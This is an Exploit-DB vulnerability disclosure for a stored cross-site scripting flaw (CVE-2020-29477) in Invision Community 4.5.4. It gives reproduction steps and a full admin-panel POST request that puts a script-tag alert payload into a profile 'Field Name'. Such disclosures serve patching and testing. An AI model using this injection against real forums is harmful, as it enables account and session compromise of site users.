Invision Community 4.5.4 - 'Field Name' Stored Cross-Site Scripting

EDB-ID:

49188




Platform:

Multiple

Date:

2020-12-03


# Exploit Title: Invision Community 4.5.4 - 'Field Name' Stored Cross-Site Scripting 
# Date: 02-12-2020
# Exploit Author: Hemant Patidar (HemantSolo)
# Vendor Homepage: https://invisioncommunity.com/
# Software Link: https://invisioncommunity.com/buy
# Version: 4.5.4
# Tested on: Windows 10/Kali Linux
# CVE:  CVE-2020-29477

Vulnerable Parameters: Profile - Field Name.

Steps-To-Reproduce:
1. Go to the Invision Community admin page.
2. Now go to the Members - MEMBER SETTINGS - Profiles.
3. Now click on Add Profile field.
4. Put the below payload in Field Name:
"<script>alert(123)</script>"
5. Now click on Save button.
6. The XSS will be triggered.


POST /admin/?app=core&module=membersettings&controller=profiles&tab=profilefields&subnode=1&do=form&parent=3&ajaxValidate=1 HTTP/1.1
Host: 127.0.0.1
Connection: close
Content-Length: 660
Accept: */*
DNT: 1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: https://127.0.0.1
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://127.0.0.1/admin/?app=core&module=membersettings&controller=profiles
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,hi;q=0.7,ru;q=0.6
Cookie: XYZ

form_new_activeTab=&form_new_submitted=1&csrfKey=3ffc7a5774ddc0d2a7142d2072191efc&MAX_FILE_SIZE=20971520&pf_title%5B1%5D=%3Cscript%3Ealert(123)%3C%2Fscript%3E&pf_desc%5B1%5D=Test&pf_group_id=3&pf_type=Text&pf_allow_attachments=0&pf_allow_attachments_checkbox=1&pf_content%5B0%5D=&pf_multiple=0&pf_max_input=0&pf_input_format=&pf_member_edit=0&pf_member_edit_checkbox=1&radio_pf_member_hide__empty=1&pf_member_hide=all&radio_pf_topic_hide__empty=1&pf_topic_hide=hide&pf_search_type=loose&pf_search_type_on_off=exact&radio_pf_profile_format__empty=1&pf_profile_format=default&pf_profile_format_custom=&radio_pf_format__empty=1&pf_format=default&pf_format_custom=